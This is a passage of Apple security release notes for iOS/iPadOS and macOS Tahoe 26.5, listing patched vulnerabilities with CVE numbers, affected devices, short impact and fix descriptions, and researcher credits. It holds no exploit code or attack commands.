CVE-2026-43654: Vaagn Vardanian, Nathaniel Oh (@calysteon)

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: A local user may be able to cause unexpected system termination or read kernel memory

Description: A buffer overflow was addressed with improved input validation.

CVE-2026-28897: popku1337, Billy Jheng Bing Jhong and Pan Zhenpeng (@Peterpan0927) of STAR Labs SG Pte. Ltd., Robert Tran, Aswin kumar Gokulakannan

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to gain root privileges

Description: An authorization issue was addressed with improved state management.

CVE-2026-28951: Csaba Fitzl (@theevilbit) of Iru

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to cause unexpected system termination or write kernel memory

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2026-28972: Billy Jheng Bing Jhong and Pan Zhenpeng (@Peterpan0927) of STAR Labs SG Pte. Ltd., Ryan Hileman via Xint Code (xint.io)

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to cause unexpected system termination

Description: A race condition was addressed with additional validation.

CVE-2026-28986: Chris Betz, Tristan Madani (@TristanInSec) from Talence Security, Ryan Hileman via Xint Code (xint.io)

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to leak sensitive kernel state

Description: A logging issue was addressed with improved data redaction.

CVE-2026-28987: Dhiyanesh Selvaraj (@redroot97)

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: A remote attacker may be able to cause a denial of service

Description: A type confusion issue was addressed with improved checks.

CVE-2026-28983: Ruslan Dautov

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An attacker on the local network may be able to cause a denial-of-service

Description: The issue was addressed with improved memory handling.

CVE-2026-43653: Atul R V

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An attacker on the local network may be able to cause a denial-of-service

Description: A null pointer dereference was addressed with improved input validation.

CVE-2026-28985: Omar Cerrito

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory

Description: A use after free issue was addressed with improved memory management.

CVE-2026-43668: Anton Pakhunov, Ricardo Prado

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An attacker on the local network may be able to cause a denial-of-service

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2026-43666: Ian van der Wurff (ian.nl)

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing a maliciously crafted image may corrupt process memory

Description: The issue was addressed with improved memory handling.

CVE-2026-28940: Michael DePlante (@izobashi) of TrendAI Zero Day Initiative

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An attacker may be able to track users through their IP address

Description: This issue was addressed through improved state management.

CVE-2026-28906: Ilya Sc. Jowell A.

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Parsing a maliciously crafted file may lead to an unexpected app termination

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2026-43656: Peter Malone

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: A remote attacker may be able to cause unexpected app termination

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2026-28846: Peter Malone

Available for: iPhone 15 and later

Impact: An attacker with physical access may be able to use Visual Intelligence to access sensitive user data during iPhone Mirroring

Description: A privacy issue was addressed by removing the vulnerable code.

CVE-2026-28963: Jorge Welch

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access user-sensitive data

Description: This issue was addressed by adding an additional prompt for user consent.

CVE-2026-28993: Doron Assness

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to cause a denial-of-service

Description: This issue was addressed with improved checks to prevent unauthorized actions.

CVE-2026-28974: Andy Koo (@andykoo) of Hexens

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to capture a user's screen

Description: An issue with app access to camera metadata was addressed with improved logic.

CVE-2026-28957: Adriatik Raci

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access sensitive user data

Description: A race condition was addressed with additional validation.

CVE-2026-28996: Alex Radocea

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may prevent Content Security Policy from being enforced

Description: A validation issue was addressed with improved logic.

WebKit Bugzilla: 308906

CVE-2026-43660: Cantina

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may prevent Content Security Policy from being enforced

Description: The issue was addressed with improved input validation.

WebKit Bugzilla: 308675

CVE-2026-28907: Cantina

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may disclose sensitive user information

Description: This issue was addressed with improved access restrictions.

WebKit Bugzilla: 309698

CVE-2026-28962: Luke Francis, Vaagn Vardanian, kwak kiyong / kakaogames, Vitaly Simonovich, Adel Bouachraoui, greenbynox

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to an unexpected Safari crash

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 307669

CVE-2026-43658: Do Young Park

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to an unexpected process crash

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 308545

CVE-2026-28905: Yuhao Hu, Yuanming Lai, Chenggang Wu, and Zhe Wang

WebKit Bugzilla: 308707

CVE-2026-28847: DARKNAVY (@DarkNavyOrg), Anonymous working with TrendAI Zero Day Initiative, Daniel Rhea

WebKit Bugzilla: 309601

CVE-2026-28904: Luka Rački

WebKit Bugzilla: 310880

CVE-2026-28955: wac and Kookhwan Lee working with TrendAI Zero Day Initiative

WebKit Bugzilla: 310303

CVE-2026-28903: Mateusz Krzywicki (iVerify.io)

WebKit Bugzilla: 309628

CVE-2026-28953: Maher Azzouzi

WebKit Bugzilla: 309861

CVE-2026-28902: Tristan Madani (@TristanInSec) from Talence Security, Nathaniel Oh (@calysteon)

WebKit Bugzilla: 310207

CVE-2026-28901: Aisle offensive security research team (Joshua Rogers, Luigino Camastra, Igor Morgenstern, and Guido Vranken), Maher Azzouzi, Ngan Nguyen of Calif.io

WebKit Bugzilla: 311631

CVE-2026-28913: an anonymous researcher

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to an unexpected process crash

Description: A use-after-free issue was addressed with improved memory management.

WebKit Bugzilla: 313939

CVE-2026-28883: kwak kiyong / kakaogames

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access sensitive user data

Description: This issue was addressed with improved data protection.

WebKit Bugzilla: 311228

CVE-2026-28958: Cantina

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to an unexpected process crash

Description: The issue was addressed with improved input validation.

WebKit Bugzilla: 310527

CVE-2026-28917: Vitaly Simonovich

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to an unexpected Safari crash

Description: A use-after-free issue was addressed with improved memory management.

WebKit Bugzilla: 310234

CVE-2026-28947: dr3dd

WebKit Bugzilla: 312180

CVE-2026-28942: Milad Nasr and Nicholas Carlini with Claude, Anthropic

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: A malicious iframe may use another website’s download settings

Description: The issue was addressed with improved UI handling.

WebKit Bugzilla: 311288

CVE-2026-28971: Khiem Tran

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to an unexpected process crash

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 311131

CVE-2026-28944: Kenneth Hsu of Palo Alto Networks, Jérôme DJOUDER, dr3dd

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An attacker in a privileged network position may be able to perform a denial-of-service attack using crafted Wi-Fi packets

Description: A use after free issue was addressed with improved memory management.

CVE-2026-28994: Alex Radocea

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: A user may be able to view restricted content from the lock screen

Description: A privacy issue was addressed with improved checks.

CVE-2026-28965: Abhay Kailasia (@abhay_kailasia) from Safran Mumbai India

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Visiting a maliciously crafted website may leak sensitive data

Description: An information leakage was addressed with additional validation.

CVE-2026-28920: Brendon Tiszka of Google Project Zero

We would like to acknowledge Mikael Kinnman for their assistance.

We would like to acknowledge Iván Savransky, YingQi Shi (@Mas0nShi) of DBAppSecurity's WeBin lab for their assistance.

We would like to acknowledge Brian Carpenter for their assistance.

We would like to acknowledge Gongyu Ma (@Mezone0) for their assistance.

We would like to acknowledge Mustafa Calap for their assistance.

We would like to acknowledge an anonymous researcher for their assistance.

We would like to acknowledge Ryan Hileman via Xint Code (xint.io), Suresh Sundaram, an anonymous researcher for their assistance.

We would like to acknowledge Chris Staite and David Hardy of Menlo Security Inc for their assistance.

We would like to acknowledge Ilias Morad (@A2nkF_) for their assistance.

We would like to acknowledge Kun Peeks (@SwayZGl1tZyyy) for their assistance.

We would like to acknowledge Himanshu Bharti (@Xpl0itme) from Khatima for their assistance.

We would like to acknowledge Jason Grove for their assistance.

We would like to acknowledge Bishal Kafle, Jeffery Kimbrow for their assistance.

We would like to acknowledge Asaf Cohen for their assistance.

We would like to acknowledge Asilbek Salimov, Mohamed Althaf for their assistance.

We would like to acknowledge Abhay Kailasia (@abhay_kailasia) from Safran Mumbai India, Christopher Mathews for their assistance.

We would like to acknowledge Dalibor Milanovic for their assistance.

We would like to acknowledge Jacob Prezant (prezant.us) for their assistance.

We would like to acknowledge Yoav Magid for their assistance.

We would like to acknowledge Shaheen Fazim for their assistance.

We would like to acknowledge Muhammad Zaid Ghifari (Mr.ZheeV), Kalimantan Utara, Qadhafy Muhammad Tera, Vitaly Simonovich for their assistance.

We would like to acknowledge Hyeonji Son (@jir4vv1t) of Demon Team for their assistance.

We would like to acknowledge Yusuf Kelany for their assistance.

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: May 11, 2026



About the security content of macOS Tahoe 26.5 - Apple Support

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security releases page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

Released May 11, 2026

Available for: macOS Tahoe

Impact: An app may be able to cause a denial-of-service

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2026-28991: Seiji Sakurai (@HeapSmasher)

Available for: macOS Tahoe

Impact: An app may be able to bypass certain Privacy preferences

Description: A permissions issue was addressed with additional restrictions.

CVE-2026-28988: Asaf Cohen

Available for: macOS Tahoe

Impact: An app may be able to cause unexpected system termination

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2026-28959: Dave G.

Available for: macOS Tahoe

Impact: A malicious app may be able to break out of its sandbox

Description: A logic issue was addressed with improved restrictions.

CVE-2026-28995: Vamshi Paili, Tony Gorez (@tonygo_) for Reverse Society

Available for: macOS Tahoe

Impact: Processing a maliciously crafted image may lead to a denial-of-service

Description: This is a vulnerability in open source code and Apple Software is among the affected projects. The CVE-ID was assigned by a third party. Learn more about the issue and CVE-ID at cve.org.

CVE-2026-1837

Available for: macOS Tahoe

Impact: Processing a maliciously crafted media file may lead to unexpected app termination or corrupt process memory

Description: A memory corruption issue was addressed with improved input validation.

CVE-2026-28956: impost0r (ret2plt)

Available for: macOS Tahoe

Impact: Processing an audio stream in a maliciously crafted media file may terminate the process

Description: The issue was addressed with improved memory handling.

CVE-2026-39869: David Ige of Beryllium Security

Available for: macOS Tahoe

Impact: An app may be able to access private information

Description: This issue was addressed through improved state management.

CVE-2026-28922: Arni Hardarson

Available for: macOS Tahoe

Impact: Processing a maliciously crafted file may lead to unexpected app termination

Description: The issue was addressed with improved checks.

CVE-2026-28936: Andreas Jaegersberger & Ro Achterberg of Nosebeard Labs

Available for: macOS Tahoe

Impact: Parsing a maliciously crafted file may lead to an unexpected app termination

Description: An out-of-bounds access issue was addressed with improved bounds checking.

CVE-2026-28918: Niels Hofmans, Anonymous working with TrendAI Zero Day Initiative

Available for: macOS Tahoe

Impact: An app may be able to gain root privileges

Description: A parsing issue in the handling of directory paths was addressed with improved path validation.

CVE-2026-28915: Andreas Jaegersberger & Ro Achterberg of Nosebeard Labs

Available for: macOS Tahoe

Impact: An app may be able to access sensitive user data

Description: A race condition was addressed with additional validation.

CVE-2026-43659: Alex Radocea

Available for: macOS Tahoe

Impact: A malicious app may be able to break out of its sandbox

Description: A logging issue was addressed with improved data redaction.

CVE-2026-28923: Kun Peeks (@SwayZGl1tZyyy)

Available for: macOS Tahoe

Impact: An app may be able to cause unexpected system termination or write kernel memory

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2026-28925: Aswin Kumar Gokula Kannan, Dave G.

Available for: macOS Tahoe

Impact: Processing a maliciously crafted image may corrupt process memory

Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2026-43661: an anonymous researcher

Available for: macOS Tahoe

Impact: Processing a maliciously crafted file may lead to unexpected app termination

Description: The issue was addressed with improved bounds checks.

CVE-2026-28977: Suresh Sundaram

Available for: macOS Tahoe

Impact: Processing a maliciously crafted image may corrupt process memory

Description: The issue was addressed with improved memory handling.

CVE-2026-28990: Jiri Ha, Arni Hardarson

Available for: macOS Tahoe

Impact: A malicious app may be able to break out of its sandbox

Description: A permissions issue was addressed with additional restrictions.

CVE-2026-28978: wdszzml and Atuin Automated Vulnerability Discovery Engine

Available for: macOS Tahoe

Impact: An attacker may be able to cause unexpected app termination

Description: A memory corruption vulnerability was addressed with improved locking.

CVE-2026-28992: Johnny Franks (@zeroxjf)

Available for: macOS Tahoe

Impact: An app may be able to determine kernel memory layout

Description: A logging issue was addressed with improved data redaction.

CVE-2026-28943: Google Threat Analysis Group

Available for: macOS Tahoe

Impact: An app may be able to cause unexpected system termination

Description: A use after free issue was addressed with improved memory management.

CVE-2026-28969: Mihalis Haatainen, Ari Hawking, Ashish Kunwar

Available for: macOS Tahoe

Impact: An app may be able to cause unexpected system termination or read kernel memory

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2026-43655: Somair Ansar and an anonymous researcher

Available for: macOS Tahoe

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2026-43654: Vaagn Vardanian, Nathaniel Oh (@calysteon)

Available for: macOS Tahoe

Impact: An app may be able to modify protected parts of the file system

Description: A denial of service issue was addressed by removing the vulnerable code.

CVE-2026-28908: beist

Available for: macOS Tahoe

Impact: A maliciously crafted disk image may bypass Gatekeeper checks

Description: A file quarantine bypass was addressed with additional checks.

CVE-2026-28954: Yiğit Can YILMAZ (@yilmazcanyigit)

Available for: macOS Tahoe

Impact: A local user may be able to cause unexpected system termination or read kernel memory

Description: A buffer overflow was addressed with improved input validation.

CVE-2026-28897: popku1337, Billy Jheng Bing Jhong and Pan Zhenpeng (@Peterpan0927) of STAR Labs SG Pte. Ltd., Robert Tran, Aswin kumar Gokulakannan

Available for: macOS Tahoe

Impact: An app may be able to cause unexpected system termination

Description: An integer overflow was addressed with improved input validation.

CVE-2026-28952: Calif.io in collaboration with Claude and Anthropic Research

Available for: macOS Tahoe

Impact: An app may be able to gain root privileges

Description: An authorization issue was addressed with improved state management.

CVE-2026-28951: Csaba Fitzl (@theevilbit) of Iru

Available for: macOS Tahoe

Impact: An app may be able to cause unexpected system termination or write kernel memory

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2026-28972: Billy Jheng Bing Jhong and Pan Zhenpeng (@Peterpan0927) of STAR Labs SG Pte. Ltd., Ryan Hileman via Xint Code (xint.io)

Available for: macOS Tahoe

Impact: An app may be able to cause unexpected system termination

Description: A race condition was addressed with additional validation.

CVE-2026-28986: Chris Betz, Tristan Madani (@TristanInSec) from Talence Security, Ryan Hileman via Xint Code (xint.io)

Available for: macOS Tahoe

Impact: An app may be able to leak sensitive kernel state

Description: A logging issue was addressed with improved data redaction.

CVE-2026-28987: Dhiyanesh Selvaraj (@redroot97)

Available for: macOS Tahoe

Impact: A remote attacker may be able to cause a denial of service

Description: A type confusion issue was addressed with improved checks.

CVE-2026-28983: Ruslan Dautov

Available for: macOS Tahoe

Impact: Replying to an email could display remote images in Mail in Lockdown Mode

Description: A logic issue was addressed with improved checks.

CVE-2026-28929: Yiğit Can YILMAZ (@yilmazcanyigit)

Available for: macOS Tahoe

Impact: An attacker on the local network may be able to cause a denial-of-service

Description: The issue was addressed with improved memory handling.

CVE-2026-43653: Atul R V

Available for: macOS Tahoe

Impact: An attacker on the local network may be able to cause a denial-of-service

Description: A null pointer dereference was addressed with improved input validation.

CVE-2026-28985: Omar Cerrito

Available for: macOS Tahoe

Impact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory

Description: A use after free issue was addressed with improved memory management.

CVE-2026-43668: Anton Pakhunov, Ricardo Prado

Available for: macOS Tahoe

Impact: An attacker on the local network may be able to cause a denial-of-service

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2026-43666: Ian van der Wurff (ian.nl)

Available for: macOS Tahoe

Impact: Processing a maliciously crafted file may lead to a denial-of-service or potentially disclose memory contents

Description: The issue was addressed with improved checks.

CVE-2026-28941: Michael DePlante (@izobashi) of TrendAI Zero Day Initiative

Available for: macOS Tahoe

Impact: Processing a maliciously crafted image may corrupt process memory

Description: The issue was addressed with improved memory handling.

CVE-2026-28940: Michael DePlante (@izobashi) of TrendAI Zero Day Initiative

Available for: macOS Tahoe

Impact: An attacker with physical access to a locked device may be able to view sensitive user information

Description: This issue was addressed with improved checks.

CVE-2026-28961: Dan Raviv

Available for: macOS Tahoe

Impact: An attacker may be able to track users through their IP address

Description: This issue was addressed through improved state management.

CVE-2026-28906: Ilya Sc. Jowell A.

Available for: macOS Tahoe

Impact: Parsing a maliciously crafted file may lead to an unexpected app termination

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2026-43656: Peter Malone

Available for: macOS Tahoe

Impact: An app may be able to access protected user data

Description: A permissions issue was addressed with additional restrictions.

CVE-2026-43652: Asaf Cohen

Available for: macOS Tahoe

Impact: Processing a maliciously crafted image may corrupt process memory

Description: The issue was addressed with improved memory handling.

CVE-2026-39870: Peter Malone

Available for: macOS Tahoe

Impact: A remote attacker may be able to cause unexpected app termination

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2026-28846: Peter Malone

Available for: macOS Tahoe

Impact: An app may be able to access user-sensitive data

Description: This issue was addressed by adding an additional prompt for user consent.

CVE-2026-28993: Doron Assness

Available for: macOS Tahoe

Impact: A remote attacker may be able to cause unexpected system termination

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2026-28848: Peter Malone, Dave G. and Alex Radocea of Supernetworks

Available for: macOS Tahoe

Impact: An app may be able to access protected user data

Description: A permissions issue was addressed with additional restrictions.

CVE-2026-28930: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.

Available for: macOS Tahoe

Impact: An app may be able to cause a denial-of-service

Description: This issue was addressed with improved checks to prevent unauthorized actions.

CVE-2026-28974: Andy Koo (@andykoo) of Hexens

Available for: macOS Tahoe

Impact: An app may be able to access sensitive user data

Description: A race condition was addressed with additional validation.

CVE-2026-28996: Alex Radocea

Available for: macOS Tahoe

Impact: An app may be able to gain root privileges

Description: A consistency issue was addressed with improved state handling.

CVE-2026-28919: Amy (amys.website)

Available for: macOS Tahoe

Impact: An app may be able to access Contacts without user consent

Description: A race condition was addressed with improved handling of symbolic links.

CVE-2026-28924: Andreas Jaegersberger & Ro Achterberg of Nosebeard Labs, YingQi Shi (@Mas0nShi) of DBAppSecurity's WeBin lab

Available for: macOS Tahoe

Impact: An app may be able to observe unprotected user data

Description: A path handling issue was addressed with improved logic.

CVE-2026-39871: an anonymous researcher

Available for: macOS Tahoe

Impact: An app may be able to gain root privileges

Description: An information leakage was addressed with additional validation.

CVE-2026-28976: David Ige - Beryllium Security

Available for: macOS Tahoe

Impact: Processing maliciously crafted web content may prevent Content Security Policy from being enforced

Description: A validation issue was addressed with improved logic.

WebKit Bugzilla: 308906

CVE-2026-43660: Cantina

Available for: macOS Tahoe

Impact: Processing maliciously crafted web content may prevent Content Security Policy from being enforced

Description: The issue was addressed with improved input validation.

WebKit Bugzilla: 308675

CVE-2026-28907: Cantina

Available for: macOS Tahoe

Impact: Processing maliciously crafted web content may disclose sensitive user information

Description: This issue was addressed with improved access restrictions.

WebKit Bugzilla: 309698

CVE-2026-28962: Luke Francis, Vaagn Vardanian, kwak kiyong / kakaogames, Vitaly Simonovich, Adel Bouachraoui, greenbynox

Available for: macOS Tahoe

Impact: Processing maliciously crafted web content may lead to an unexpected Safari crash

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 307669

CVE-2026-43658: Do Young Park

Available for: macOS Tahoe

Impact: Processing maliciously crafted web content may lead to an unexpected process crash

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 308545

CVE-2026-28905: Yuhao Hu, Yuanming Lai, Chenggang Wu, and Zhe Wang

WebKit Bugzilla: 308707

CVE-2026-28847: DARKNAVY (@DarkNavyOrg), Anonymous working with TrendAI Zero Day Initiative, Daniel Rhea

WebKit Bugzilla: 309601

CVE-2026-28904: Luka Rački

WebKit Bugzilla: 310880

CVE-2026-28955: wac and Kookhwan Lee working with TrendAI Zero Day Initiative

WebKit Bugzilla: 310303

CVE-2026-28903: Mateusz Krzywicki (iVerify.io)

WebKit Bugzilla: 309628

CVE-2026-28953: Maher Azzouzi

WebKit Bugzilla: 309861

CVE-2026-28902: Tristan Madani (@TristanInSec) from Talence Security, Nathaniel Oh (@calysteon)

WebKit Bugzilla: 310207

CVE-2026-28901: Aisle offensive security research team (Joshua Rogers, Luigino Camastra, Igor Morgenstern, and Guido Vranken), Maher Azzouzi, Ngan Nguyen of Calif.io

WebKit Bugzilla: 311631

CVE-2026-28913: an anonymous researcher

Available for: macOS Tahoe

Impact: Processing maliciously crafted web content may lead to an unexpected process crash

Description: A use-after-free issue was addressed with improved memory management.

WebKit Bugzilla: 313939

CVE-2026-28883: kwak kiyong / kakaogames

Available for: macOS Tahoe

Impact: An app may be able to access sensitive user data

Description: This issue was addressed with improved data protection.

WebKit Bugzilla: 311228

CVE-2026-28958: Cantina

Available for: macOS Tahoe

Impact: Processing maliciously crafted web content may lead to an unexpected process crash

Description: The issue was addressed with improved input validation.

WebKit Bugzilla: 310527

CVE-2026-28917: Vitaly Simonovich

Available for: macOS Tahoe

Impact: Processing maliciously crafted web content may lead to an unexpected Safari crash

Description: A use-after-free issue was addressed with improved memory management.

WebKit Bugzilla: 310234

CVE-2026-28947: dr3dd

WebKit Bugzilla: 310544

CVE-2026-28946: Gia Bui (@yabeow) from Calif.io, dr3dd, w0wbox

WebKit Bugzilla: 312180

CVE-2026-28942: Milad Nasr and Nicholas Carlini with Claude, Anthropic

Available for: macOS Tahoe

Impact: A malicious iframe may use another website’s download settings

Description: The issue was addressed with improved UI handling.

WebKit Bugzilla: 311288

CVE-2026-28971: Khiem Tran

Available for: macOS Tahoe

Impact: Processing maliciously crafted web content may lead to an unexpected process crash

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 311131

CVE-2026-28944: Kenneth Hsu of Palo Alto Networks, Jérôme DJOUDER, dr3dd

Available for: macOS Tahoe

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2026-28819: Wang Yu

Available for: macOS Tahoe

Impact: An attacker in a privileged network position may be able to perform a denial-of-service attack using crafted Wi-Fi packets

Description: A use after free issue was addressed with improved memory management.

CVE-2026-28994: Alex Radocea

Available for: macOS Tahoe

Impact: A maliciously crafted ZIP archive may bypass Gatekeeper checks

Description: A logic issue was addressed with improved file handling.

CVE-2026-28914: Andreas Jaegersberger & Ro Achterberg of Nosebeard Labs (nosebeard.co)

Available for: macOS Tahoe

Impact: Visiting a maliciously crafted website may leak sensitive data

Description: An information leakage was addressed with additional validation.

CVE-2026-28920: Brendon Tiszka of Google Project Zero

We would like to acknowledge Mikael Kinnman for their assistance.

We would like to acknowledge Asaf Cohen, Johan Wahyudi for their assistance.

We would like to acknowledge Iván Savransky, Kun Peeks (@SwayZGl1tZyyy), YingQi Shi (@Mas0nShi) of DBAppSecurity's WeBin lab for their assistance.

We would like to acknowledge Brian Carpenter for their assistance.

We would like to acknowledge Andreas Jaegersberger & Ro Achterberg of Nosebeard Labs for their assistance.

We would like to acknowledge Jordan Pittman for their assistance.

We would like to acknowledge Mustafa Calap for their assistance.

We would like to acknowledge an anonymous researcher for their assistance.

We would like to acknowledge Ryan Hileman via Xint Code (xint.io), an anonymous researcher for their assistance.

We would like to acknowledge Andreas Jaegersberger & Ro Achterberg of Nosebeard Labs for their assistance.

We would like to acknowledge Chris Staite and David Hardy of Menlo Security Inc for their assistance.

We would like to acknowledge Ilias Morad (@A2nkF_) for their assistance.

We would like to acknowledge Kun Peeks (@SwayZGl1tZyyy) for their assistance.

We would like to acknowledge Jason Grove for their assistance.

We would like to acknowledge Jeffery Kimbrow for their assistance.

We would like to acknowledge Asilbek Salimov for their assistance.

We would like to acknowledge Anand Patil for their assistance.

We would like to acknowledge Christopher Mathews for their assistance.

We would like to acknowledge Cem Onat Karagun, Surya Kushwaha for their assistance.

We would like to acknowledge sean mutuku for their assistance.

We would like to acknowledge Robert Mindo for their assistance.

We would like to acknowledge Yoav Magid for their assistance.

